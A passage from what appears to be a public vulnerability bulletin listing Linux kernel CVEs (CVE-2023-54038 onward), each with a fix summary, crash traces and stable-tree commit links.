https://git.kernel.org/stable/c/b3e7b3a6ee92ab927f750a6b19615ce88ece808f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_conn: return ERR_PTR instead of NULL when there is no link hci_connect_sco currently returns NULL when there is no link (i.e. when hci_conn_link() returns NULL). sco_connect() expects an ERR_PTR in case of any error (see line 266 in sco.c). Thus, hcon set as NULL passes through to sco_conn_add(), which tries to get hcon->hdev, resulting in dereferencing a NULL pointer as reported by syzkaller. The same issue exists for iso_connect_cis() calling hci_connect_cis(). Thus, make hci_connect_sco() and hci_connect_cis() return ERR_PTR instead of NULL. | 2025-12-24 | not yet calculated | CVE-2023-54038 | https://git.kernel.org/stable/c/357ab53c83a5322437fa434e9a9e3e0bafe6b383 https://git.kernel.org/stable/c/b4066eb04bb67e7ff66e5aaab0db4a753f37eaad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: j1939: j1939_tp_tx_dat_new(): fix out-of-bounds memory access In the j1939_tp_tx_dat_new() function, an out-of-bounds memory access could occur during the memcpy() operation if the size of skb->cb is larger than the size of struct j1939_sk_buff_cb. This is because the memcpy() operation uses the size of skb->cb, leading to a read beyond the struct j1939_sk_buff_cb. Updated the memcpy() operation to use the size of struct j1939_sk_buff_cb instead of the size of skb->cb. This ensures that the memcpy() operation only reads the memory within the bounds of struct j1939_sk_buff_cb, preventing out-of-bounds memory access. Additionally, add a BUILD_BUG_ON() to check that the size of skb->cb is greater than or equal to the size of struct j1939_sk_buff_cb. This ensures that the skb->cb buffer is large enough to hold the j1939_sk_buff_cb structure. [mkl: rephrase commit message] | 2025-12-24 | not yet calculated | CVE-2023-54039 | https://git.kernel.org/stable/c/d2136f05690c272dfc9f9d6efcc51d5f53494b33 https://git.kernel.org/stable/c/70caa596d158a5d84b117f722d58f3ea503a5ba9 https://git.kernel.org/stable/c/4fe1d9b6231a68ffc91318f57fd8e4982f028cf7 https://git.kernel.org/stable/c/4c3fb22a6ec68258ee129a2e6b720f43dffc562f https://git.kernel.org/stable/c/36befc9aed6202b4a9b906529aea13eacd7e34ff https://git.kernel.org/stable/c/b45193cb4df556fe6251b285a5ce44046dd36b4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: fix wrong fallback logic for FDIR When adding a FDIR filter, if ice_vc_fdir_set_irq_ctx returns failure, the inserted fdir entry will not be removed and if ice_vc_fdir_write_fltr returns failure, the fdir context info for irq handler will not be cleared which may lead to inconsistent or memory leak issue. This patch refines failure cases to resolve this issue. | 2025-12-24 | not yet calculated | CVE-2023-54040 | https://git.kernel.org/stable/c/391d28c0e38c0e5b11a4240a2b4976cf63e87f45 https://git.kernel.org/stable/c/aad3b871efe26f36f45f8b4649653b5d3fd9c35e https://git.kernel.org/stable/c/cbfed5f114b5310f221979fc8190f55c6abc3400 https://git.kernel.org/stable/c/b4a01ace20f5c93c724abffc0a83ec84f514b98d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix memory leak when removing provided buffers When removing provided buffers, io_buffer structs are not being disposed of, leading to a memory leak. They can't be freed individually, because they are allocated in page-sized groups. They need to be added to some free list instead, such as io_buffers_cache. All callers already hold the lock protecting it, apart from when destroying buffers, so had to extend the lock there. | 2025-12-24 | not yet calculated | CVE-2023-54041 | https://git.kernel.org/stable/c/ac48787f58d1068f4e06d627c1135784d64b4c72 https://git.kernel.org/stable/c/c117c15927772d1624c29c092b6bd3f47c7faa48 https://git.kernel.org/stable/c/b4a72c0589fdea6259720375426179888969d6a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/64s: Fix VAS mm use after free The refcount on mm is dropped before the coprocessor is detached. | 2025-12-24 | not yet calculated | CVE-2023-54042 | https://git.kernel.org/stable/c/f7d92313002b2d543500cc417d8079aaed1fb0a8 https://git.kernel.org/stable/c/4e82f92c349ea603736ade1e814861c0182a55ad https://git.kernel.org/stable/c/db8657fdd53c5e3069149d7f957cb60e63027bb2 https://git.kernel.org/stable/c/421cd1544480f2458042fe7f4913a2069c4d7251 https://git.kernel.org/stable/c/b4bda59b47879cce38a6ec5a01cd3cac702b5331 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Do not add the same hwpt to the ioas->hwpt_list twice The hwpt is added to the hwpt_list only during its creation, it is never added again. This hunk is some missed leftover from rework. Adding it twice will corrupt the linked list in some cases. It effects HWPT specific attachment, which is something the test suite cannot cover until we can create a legitimate struct device with a non-system iommu "driver" (ie we need the bus removed from the iommu code) | 2025-12-24 | not yet calculated | CVE-2023-54043 | https://git.kernel.org/stable/c/c44adefdcf472f946f0632f4e0ddcbf3e00b8516 https://git.kernel.org/stable/c/b4ff830eca097df51af10a9be29e8cc817327919 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spmi: Add a check for remove callback when removing a SPMI driver When removing a SPMI driver, there can be a crash due to NULL pointer dereference if it does not have a remove callback defined. This is one such call trace observed when removing the QCOM SPMI PMIC driver: dump_backtrace.cfi_jt+0x0/0x8 dump_stack_lvl+0xd8/0x16c panic+0x188/0x498 __cfi_slowpath+0x0/0x214 __cfi_slowpath+0x1dc/0x214 spmi_drv_remove+0x16c/0x1e0 device_release_driver_internal+0x468/0x79c driver_detach+0x11c/0x1a0 bus_remove_driver+0xc4/0x124 driver_unregister+0x58/0x84 cleanup_module+0x1c/0xc24 [qcom_spmi_pmic] __do_sys_delete_module+0x3ec/0x53c __arm64_sys_delete_module+0x18/0x28 el0_svc_common+0xdc/0x294 el0_svc+0x38/0x9c el0_sync_handler+0x8c/0xf0 el0_sync+0x1b4/0x1c0 If a driver has all its resources allocated through devm_() APIs and does not need any other explicit cleanup, it would not require a remove callback to be defined. Hence, add a check for remove callback presence before calling it when removing a SPMI driver. | 2025-12-24 | not yet calculated | CVE-2023-54044 | https://git.kernel.org/stable/c/b95a69214daea4aab1c8bad96571d988a62e2c97 https://git.kernel.org/stable/c/699949219e35fe29fd42ccf8cd92c989c3d15109 https://git.kernel.org/stable/c/54dda732225555dc6d660e95793c54a0a44b612c https://git.kernel.org/stable/c/c45ab3ab9c371c9ac22bbe1217e5abb2e55a3d4b https://git.kernel.org/stable/c/ee0b6146317a98bfec848d7bde5586beb245a38f https://git.kernel.org/stable/c/428cc252701d6864151f3a296ffc23e1e49a7408 https://git.kernel.org/stable/c/af763c29b9e7040fedd0077bca053b101438a3a4 https://git.kernel.org/stable/c/0f3ef30c1c05502f5de3b73b3715d5994845c1b4 https://git.kernel.org/stable/c/b56eef3e16d888883fefab47425036de80dd38fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: audit: fix possible soft lockup in __audit_inode_child() Tracefs or debugfs maybe cause hundreds to thousands of PATH records, too many PATH records maybe cause soft lockup. For example: 1. CONFIG_KASAN=y && CONFIG_PREEMPTION=n 2. auditctl -a exit,always -S open -k key 3. sysctl -w kernel.watchdog_thresh=5 4. mkdir /sys/kernel/debug/tracing/instances/test There may be a soft lockup as follows: watchdog: BUG: soft lockup - CPU#45 stuck for 7s! [mkdir:15498] Kernel panic - not syncing: softlockup: hung tasks Call trace: dump_backtrace+0x0/0x30c show_stack+0x20/0x30 dump_stack+0x11c/0x174 panic+0x27c/0x494 watchdog_timer_fn+0x2bc/0x390 __run_hrtimer+0x148/0x4fc __hrtimer_run_queues+0x154/0x210 hrtimer_interrupt+0x2c4/0x760 arch_timer_handler_phys+0x48/0x60 handle_percpu_devid_irq+0xe0/0x340 __handle_domain_irq+0xbc/0x130 gic_handle_irq+0x78/0x460 el1_irq+0xb8/0x140 __audit_inode_child+0x240/0x7bc tracefs_create_file+0x1b8/0x2a0 trace_create_file+0x18/0x50 event_create_dir+0x204/0x30c __trace_add_new_event+0xac/0x100 event_trace_add_tracer+0xa0/0x130 trace_array_create_dir+0x60/0x140 trace_array_create+0x1e0/0x370 instance_mkdir+0x90/0xd0 tracefs_syscall_mkdir+0x68/0xa0 vfs_mkdir+0x21c/0x34c do_mkdirat+0x1b4/0x1d4 __arm64_sys_mkdirat+0x4c/0x60 el0_svc_common.constprop.0+0xa8/0x240 do_el0_svc+0x8c/0xc0 el0_svc+0x20/0x30 el0_sync_handler+0xb0/0xb4 el0_sync+0x160/0x180 Therefore, we add cond_resched() to __audit_inode_child() to fix it. | 2025-12-24 | not yet calculated | CVE-2023-54045 | https://git.kernel.org/stable/c/d061e2bfc20f2914656385816e0d20566213c54c https://git.kernel.org/stable/c/1640c7bd4eddec6c72f3a99cbb74e333a2ce9f5d https://git.kernel.org/stable/c/f6364fa751d7486502c777f124a14d4d543fc5eb https://git.kernel.org/stable/c/98ef243d5900d75a64539a2165745bffbb155d43 https://git.kernel.org/stable/c/0152e7758cc4e9f8bfba8dbea4438d8e488d6c08 https://git.kernel.org/stable/c/9ca08adb75fb40a8f742c371927ee73f9dc753bf https://git.kernel.org/stable/c/8a40b491372966ba5426e138a53460985565d5a6 https://git.kernel.org/stable/c/8e76b944a7b9bddef190ffe2e29c9ae342ab91ed https://git.kernel.org/stable/c/b59bc6e37237e37eadf50cd5de369e913f524463 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: essiv - Handle EBUSY correctly As it is essiv only handles the special return value of EINPROGERSS, which means that in all other cases it will free data related to the request. However, as the caller of essiv may specify MAY_BACKLOG, we also need to expect EBUSY and treat it in the same way. Otherwise backlogged requests will trigger a use-after-free. | 2025-12-24 | not yet calculated | CVE-2023-54046 | https://git.kernel.org/stable/c/c61e7d182ee3f3f5ecf18a2964e303d49c539b52 https://git.kernel.org/stable/c/796e02cca30a67322161f0745e5ce994bbe75605 https://git.kernel.org/stable/c/840a1d3b77c1b062bd62b4733969a5b1efc274ce https://git.kernel.org/stable/c/a006aa3eedb8bfd6fe317c3cfe9c86ffe76b2385 https://git.kernel.org/stable/c/69c67d451fc19d88e54f7d97e8e7c093e08357e1 https://git.kernel.org/stable/c/b5a772adf45a32c68bef28e60621f12617161556 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/rockchip: dw_hdmi: cleanup drm encoder during unbind This fixes a use-after-free crash during rmmod. The DRM encoder is embedded inside the larger rockchip_hdmi, which is allocated with the component. The component memory gets freed before the main drm device is destroyed. Fix it by running encoder cleanup before tearing down its container. [moved encoder cleanup above clk_disable, similar to bind-error-path] | 2025-12-24 | not yet calculated | CVE-2023-54047 | https://git.kernel.org/stable/c/110d4202522373d629d14597af9bac97eb58bd67 https://git.kernel.org/stable/c/218fe9b624545f4bcfb16cdb35ac3d60c8b0d8c7 https://git.kernel.org/stable/c/b5af48eedcb53491c02ded55d5991e03d6da6dbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/bnxt_re: Prevent handling any completions after qp destroy HW may generate completions that indicates QP is destroyed. Driver should not be scheduling any more completion handlers for this QP, after the QP is destroyed. Since CQs are active during the QP destroy, driver may still schedule completion handlers. This can cause a race where the destroy_cq and poll_cq running simultaneously. Snippet of kernel panic while doing bnxt_re driver load unload in loop. This indicates a poll after the CQ is freed. [77786.481636] Call Trace: [77786.481640] <TASK> [77786.481644] bnxt_re_poll_cq+0x14a/0x620 [bnxt_re] [77786.481658] ? kvm_clock_read+0x14/0x30 [77786.481693] __ib_process_cq+0x57/0x190 [ib_core] [77786.481728] ib_cq_poll_work+0x26/0x80 [ib_core] [77786.481761] process_one_work+0x1e5/0x3f0 [77786.481768] worker_thread+0x50/0x3a0 [77786.481785] ? __pfx_worker_thread+0x10/0x10 [77786.481790] kthread+0xe2/0x110 [77786.481794] ? __pfx_kthread+0x10/0x10 [77786.481797] ret_from_fork+0x2c/0x50 To avoid this, complete all completion handlers before returning the destroy QP. If free_cq is called soon after destroy_qp, IB stack will cancel the CQ work before invoking the destroy_cq verb and this will prevent any race mentioned. | 2025-12-24 | not yet calculated | CVE-2023-54048 | https://git.kernel.org/stable/c/b79a0e71d6e8692e0b6da05f8aaa7d69191cf7e7 https://git.kernel.org/stable/c/b8500538b8f5b2cd86b02754c8de83eaa7a2d6ba https://git.kernel.org/stable/c/7faa6097694164380ed19600c7a7993d071270b9 https://git.kernel.org/stable/c/b5bbc6551297447d3cca55cf907079e206e9cd82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rpmsg: glink: Add check for kstrdup Add check for the return value of kstrdup() and return the error if it fails in order to avoid NULL pointer dereference. | 2025-12-24 | not yet calculated | CVE-2023-54049 | https://git.kernel.org/stable/c/5197498c902502127a47abda5359dd7f1d41946f https://git.kernel.org/stable/c/13928a837e0f014dac0322dd9f8a67c486e7f232 https://git.kernel.org/stable/c/efa7f31669f04084ed5996ed467ba529f4c90467 https://git.kernel.org/stable/c/71ac2ffd7f80fdd350486f6645dc48456e55a59b https://git.kernel.org/stable/c/abd740db896b3c588dced175af98b95852c1854b https://git.kernel.org/stable/c/cae0787e408c30a575760a531ccb69a6b48bbfaf https://git.kernel.org/stable/c/174cf8853857c190a3c4f1f1d2d06cfd095fe859 https://git.kernel.org/stable/c/e3734a9558afac91df3c655a6f2376b9d14933b7 https://git.kernel.org/stable/c/b5c9ee8296a3760760c7b5d2e305f91412adc795 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubifs: Fix memleak when insert_old_idx() failed Following process will cause a memleak for copied up znode: dirty_cow_znode zn = copy_znode(c, znode); err = insert_old_idx(c, zbr->lnum, zbr->offs); if (unlikely(err)) return ERR_PTR(err); // No one refers to zn. Fetch a reproducer in [Link]. Function copy_znode() is split into 2 parts: resource allocation and znode replacement, insert_old_idx() is split in similar way, so resource cleanup could be done in error handling path without corrupting metadata(mem & disk). It's okay that old index inserting is put behind of add_idx_dirt(), old index is used in layout_leb_in_gaps(), so the two processes do not depend on each other. | 2025-12-24 | not yet calculated | CVE-2023-54050 | https://git.kernel.org/stable/c/cc29c7216d7f057eb0613b97dc38c7e1962a88d2 https://git.kernel.org/stable/c/6f2eee5457bc48b0426dedfd78cdbdea241a6edb https://git.kernel.org/stable/c/66e9f2fb3e753f820bec2a98e8c6387029988320 https://git.kernel.org/stable/c/3ae75f82c33fa1b4ca2006b55c84f4ef4a428d4d https://git.kernel.org/stable/c/ef9aac603659e9ffe7d69ae16e3f0fc0991a965b https://git.kernel.org/stable/c/79079cebbeed624b9d01cfcf1e3254ae1a1f6e14 https://git.kernel.org/stable/c/a6da0ab9847779e05a7416c7a98148b549de69ef https://git.kernel.org/stable/c/b5fda08ef213352ac2df7447611eb4d383cce929 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: do not allow gso_size to be set to GSO_BY_FRAGS One missing check in virtio_net_hdr_to_skb() allowed syzbot to crash kernels again [1] Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff), because this magic value is used by the kernel. [1] general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077] CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023 RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500 Code: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01 RSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202 RAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000 RDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070 RBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff R10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6 R13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff FS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109 ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120 skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53 __skb_gso_segment+0x339/0x710 net/core/gso.c:124 skb_gso_segment include/net/gso.h:83 [inline] validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625 __dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329 dev_queue_xmit include/linux/netdevice.h:3082 [inline] packet_xmit+0x257/0x380 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3087 [inline] packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119 sock_sendmsg_nosec net/socket.c:727 [inline] sock_sendmsg+0xd9/0x180 net/socket.c:750 ____sys_sendmsg+0x6ac/0x940 net/socket.c:2496 ___sys_sendmsg+0x135/0x1d0 net/socket.c:2550 __sys_sendmsg+0x117/0x1e0 net/socket.c:2579 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7ff27cdb34d9 | 2025-12-24 | not yet calculated | CVE-2023-54051 | https://git.kernel.org/stable/c/a5f9e5804d239d288d983db36bbed45ed10729a0 https://git.kernel.org/stable/c/4c9bfadb4301daaceb6c575fa6ad3bc82c152e79 https://git.kernel.org/stable/c/210ff31342ade546d8d9d0ec4d3cf9cb50ae632d https://git.kernel.org/stable/c/0a593e8a9d24360fbc469c5897d0791aa2f20ed3 https://git.kernel.org/stable/c/578371ce0d7f67ea1e65817c04478aaab0d36b68 https://git.kernel.org/stable/c/2e03a92b241102aaf490439aa1b00239f84f530f https://git.kernel.org/stable/c/e3636862f5595b3d2f02650f7b21d39043a34f3e https://git.kernel.org/stable/c/b616be6b97688f2f2bd7c4a47ab32f27f94fb2a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921: fix skb leak by txs missing in AMSDU txs may be dropped if the frame is aggregated in AMSDU. When the problem shows up, some SKBs would be hold in driver to cause network stopped temporarily. Even if the problem can be recovered by txs timeout handling, mt7921 still need to disable txs in AMSDU to avoid this issue. | 2025-12-24 | not yet calculated | CVE-2023-54052 | https://git.kernel.org/stable/c/1cd102aaedb277fbe81dd08cd9f5cae951de2bff https://git.kernel.org/stable/c/e74778e91fedc3b2a0143264887bbb32508c5000 https://git.kernel.org/stable/c/bf5d3fad7219b8de7d3a9cb59f0ea5243b018f07 https://git.kernel.org/stable/c/b642f4c5f3de0a8f47808d32b1ebd9c427a42a66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: pcie: fix possible NULL pointer dereference It is possible that iwl_pci_probe() will fail and free the trans, then afterwards iwl_pci_remove() will be called and crash by trying to access trans which is already freed, fix it. iwlwifi 0000:01:00.0: Detected crf-id 0xa5a5a5a2, cnv-id 0xa5a5a5a2 wfpm id 0xa5a5a5a2 iwlwifi 0000:01:00.0: Can't find a correct rfid for crf id 0x5a2 ... BUG: kernel NULL pointer dereference, address: 0000000000000028 ... RIP: 0010:iwl_pci_remove+0x12/0x30 [iwlwifi] pci_device_remove+0x3e/0xb0 device_release_driver_internal+0x103/0x1f0 driver_detach+0x4c/0x90 bus_remove_driver+0x5c/0xd0 driver_unregister+0x31/0x50 pci_unregister_driver+0x40/0x90 iwl_pci_unregister_driver+0x15/0x20 [iwlwifi] __exit_compat+0x9/0x98 [iwlwifi] __x64_sys_delete_module+0x147/0x260 | 2025-12-24 | not yet calculated | CVE-2023-54053 | https://git.kernel.org/stable/c/f6f2d16c77f936041b8ac495fceabded4ec6c83c https://git.kernel.org/stable/c/0fc0d287c1e7dcb39a3b9bb0f8679cd68c2156c7 https://git.kernel.org/stable/c/7545f21eee1356ec98581125c4dba9c4c0cc7397 https://git.kernel.org/stable/c/0f9a1bcb94016d3a3c455a77b01f6bb06e15f6eb https://git.kernel.org/stable/c/dcd23aa6cc0ded7950b60ce1badb80b84045c6c0 https://git.kernel.org/stable/c/b655b9a9f8467684cfa8906713d33b71ea8c8f54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix buffer overrun Klocwork warning: Buffer Overflow - Array Index Out of Bounds Driver uses fc_els_flogi to calculate size of buffer. The actual buffer is nested inside of fc_els_flogi which is smaller. Replace structure name to allow proper size calculation. | 2025-12-24 | not yet calculated | CVE-2023-54054 | https://git.kernel.org/stable/c/eecb8a491c824a9376155d26ec95b6d0054c059c https://git.kernel.org/stable/c/89250e775dcc4482d8e970ed92ad2c9458b14a8a https://git.kernel.org/stable/c/2dddbf8de128289a3fb7ae38d9bc4b2217205ec1 https://git.kernel.org/stable/c/d5e7c9cd56e987c8687859a0bf38fd86aa8f3cec https://git.kernel.org/stable/c/b68710a8094fdffe8dd4f7a82c82649f479bb453 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix memory leak of PBLE objects On rmmod of irdma, the PBLE object memory is not being freed. PBLE object memory are not statically pre-allocated at function initialization time unlike other HMC objects. PBLEs objects and the Segment Descriptors (SD) for it can be dynamically allocated during scale up and SD's remain allocated till function deinitialization. Fix this leak by adding IRDMA_HMC_IW_PBLE to the iw_hmc_obj_types[] table and skip pbles in irdma_create_hmc_obj but not in irdma_del_hmc_objects(). | 2025-12-24 | not yet calculated | CVE-2023-54055 | https://git.kernel.org/stable/c/810250c9c6616fe131099c0e51c61f2110ed07bf https://git.kernel.org/stable/c/ee02fa4a71bdb95a444124e5c11eaa22f1f44738 https://git.kernel.org/stable/c/adf58bd4018fbcd990c62e840afd2f178eefad60 https://git.kernel.org/stable/c/b69a6979dbaa2453675fe9c71bdc2497fedb11f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kheaders: Use array declaration instead of char Under CONFIG_FORTIFY_SOURCE, memcpy() will check the size of destination and source buffers. Defining kernel_headers_data as "char" would trip this check. Since these addresses are treated as byte arrays, define them as arrays (as done everywhere else). This was seen with: $ cat /sys/kernel/kheaders.tar.xz >> /dev/null detected buffer overflow in memcpy kernel BUG at lib/string_helpers.c:1027! ... RIP: 0010:fortify_panic+0xf/0x20 [...] Call Trace: <TASK> ikheaders_read+0x45/0x50 [kheaders] kernfs_fop_read_iter+0x1a4/0x2f0 ... | 2025-12-24 | not yet calculated | CVE-2023-54056 | https://git.kernel.org/stable/c/719459877d58c8aced5845c1e5b98d8d87d09197 https://git.kernel.org/stable/c/fcd2da2e6bf2640a31a2a5b118b50dc3635c707b https://git.kernel.org/stable/c/4a07d2d511e2703efd4387891d49e0326f1157f3 https://git.kernel.org/stable/c/b9f6845a492de20679b84bda6b08be347c5819da https://git.kernel.org/stable/c/d6d1af6b8611801b585c53c0cc63626c8d339e96 https://git.kernel.org/stable/c/82d2e01b95c439fe55fab5e04fc83387c42d3a48 https://git.kernel.org/stable/c/b69edab47f1da8edd8e7bfdf8c70f51a2a5d89fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Add a length limitation for the ivrs_acpihid command-line parameter The 'acpiid' buffer in the parse_ivrs_acpihid function may overflow, because the string specifier in the format string sscanf() has no width limitation. Found by InfoTeCS on behalf of Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-24 | not yet calculated | CVE-2023-54057 | https://git.kernel.org/stable/c/5e97dc748d13fad582136ba0c8cec215c7aeeb17 https://git.kernel.org/stable/c/f2a5ec7f7b28f9b9cd5fac232ff51019a7f7b9e9 https://git.kernel.org/stable/c/c513043e0afe6a8ba79d00af358655afabb576d2 https://git.kernel.org/stable/c/2ae19ac3ea82a5b87a81c10adbb497c9e58bdd60 https://git.kernel.org/stable/c/63cd11165e5e0ea2012254c764003eda1f9adb7d https://git.kernel.org/stable/c/b6b26d86c61c441144c72f842f7469bb686e1211 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: arm_ffa: Check if ffa_driver remove is present before executing Currently ffa_drv->remove() is called unconditionally from ffa_device_remove(). Since the driver registration doesn't check for it and allows it to be registered without .remove callback, we need to check for the presence of it before executing it from ffa_device_remove() to above a NULL pointer dereference like the one below: | Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 | Mem abort info: | ESR = 0x0000000086000004 | EC = 0x21: IABT (current EL), IL = 32 bits | SET = 0, FnV = 0 | EA = 0, S1PTW = 0 | FSC = 0x04: level 0 translation fault | user pgtable: 4k pages, 48-bit VAs, pgdp=0000000881cc8000 | [0000000000000000] pgd=0000000000000000, p4d=0000000000000000 | Internal error: Oops: 0000000086000004 [#1] PREEMPT SMP | CPU: 3 PID: 130 Comm: rmmod Not tainted 6.3.0-rc7 #6 | Hardware name: FVP Base RevC (DT) | pstate: 63402809 (nZCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=-c) | pc : 0x0 | lr : ffa_device_remove+0x20/0x2c | Call trace: | 0x0 | device_release_driver_internal+0x16c/0x260 | driver_detach+0x90/0xd0 | bus_remove_driver+0xdc/0x11c | driver_unregister+0x30/0x54 | ffa_driver_unregister+0x14/0x20 | cleanup_module+0x18/0xeec | __arm64_sys_delete_module+0x234/0x378 | invoke_syscall+0x40/0x108 | el0_svc_common+0xb4/0xf0 | do_el0_svc+0x30/0xa4 | el0_svc+0x2c/0x7c | el0t_64_sync_handler+0x84/0xf0 | el0t_64_sync+0x190/0x194 | 2025-12-24 | not yet calculated | CVE-2023-54058 | https://git.kernel.org/stable/c/6a26c62625c59b8dd7f52c518cb4f60a63470a0e https://git.kernel.org/stable/c/ad73dc7263ea90302d6c7eeb7e9f7cbcfa0b0617 https://git.kernel.org/stable/c/48399c297c46b4c8e77ebcf071bb586a42d0ca4e https://git.kernel.org/stable/c/b71b55248a580e9c9befc4ae060539f1f8e477da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: mediatek: mtk-svs: Enable the IRQ later If the system does not come from reset (like when is booted via kexec()), the peripheral might triger an IRQ before the data structures are initialised. [ 0.227710] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000f08 [ 0.227913] Call trace: [ 0.227918] svs_isr+0x8c/0x538 | 2025-12-24 | not yet calculated | CVE-2023-54059 | https://git.kernel.org/stable/c/6b99ebd30d65ee5ab8e8dd1d378550911eff5e4f https://git.kernel.org/stable/c/66ea96629bbccf1b483be506f3daff754069cdd3 https://git.kernel.org/stable/c/b74952aba6c3f47e7f2c5165abaeefa44c377140 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Set end correctly when doing batch carry Even though the test suite covers this it somehow became obscured that this wasn't working. The test iommufd_ioas.mock_domain.access_domain_destory would blow up rarely. end should be set to 1 because this just pushed an item, the carry, to the pfns list. Sometimes the test would blow up with: BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] SMP CPU: 5 PID: 584 Comm: iommufd Not tainted 6.5.0-rc1-dirty #1236 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:batch_unpin+0xa2/0x100 [iommufd] Code: 17 48 81 fe ff ff 07 00 77 70 48 8b 15 b7 be 97 e2 48 85 d2 74 14 48 8b 14 fa 48 85 d2 74 0b 40 0f b6 f6 48 c1 e6 04 48 01 f2 <48> 8b 3a 48 c1 e0 06 89 ca 48 89 de 48 83 e7 f0 48 01 c7 e8 96 dc RSP: 0018:ffffc90001677a58 EFLAGS: 00010246 RAX: 00007f7e2646f000 RBX: 0000000000000000 RCX: 0000000000000001 RDX: 0000000000000000 RSI: 00000000fefc4c8d RDI: 0000000000fefc4c RBP: ffffc90001677a80 R08: 0000000000000048 R09: 0000000000000200 R10: 0000000000030b98 R11: ffffffff81f3bb40 R12: 0000000000000001 R13: ffff888101f75800 R14: ffffc90001677ad0 R15: 00000000000001fe FS: 00007f9323679740(0000) GS:ffff8881ba540000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000000105ede003 CR4: 00000000003706a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? show_regs+0x5c/0x70 ? __die+0x1f/0x60 ? page_fault_oops+0x15d/0x440 ? lock_release+0xbc/0x240 ? exc_page_fault+0x4a4/0x970 ? asm_exc_page_fault+0x27/0x30 ? batch_unpin+0xa2/0x100 [iommufd] ? batch_unpin+0xba/0x100 [iommufd] __iopt_area_unfill_domain+0x198/0x430 [iommufd] ? __mutex_lock+0x8c/0xb80 ? __mutex_lock+0x6aa/0xb80 ? xa_erase+0x28/0x30 ? iopt_table_remove_domain+0x162/0x320 [iommufd] ? lock_release+0xbc/0x240 iopt_area_unfill_domain+0xd/0x10 [iommufd] iopt_table_remove_domain+0x195/0x320 [iommufd] iommufd_hw_pagetable_destroy+0xb3/0x110 [iommufd] iommufd_object_destroy_user+0x8e/0xf0 [iommufd] iommufd_device_detach+0xc5/0x140 [iommufd] iommufd_selftest_destroy+0x1f/0x70 [iommufd] iommufd_object_destroy_user+0x8e/0xf0 [iommufd] iommufd_destroy+0x3a/0x50 [iommufd] 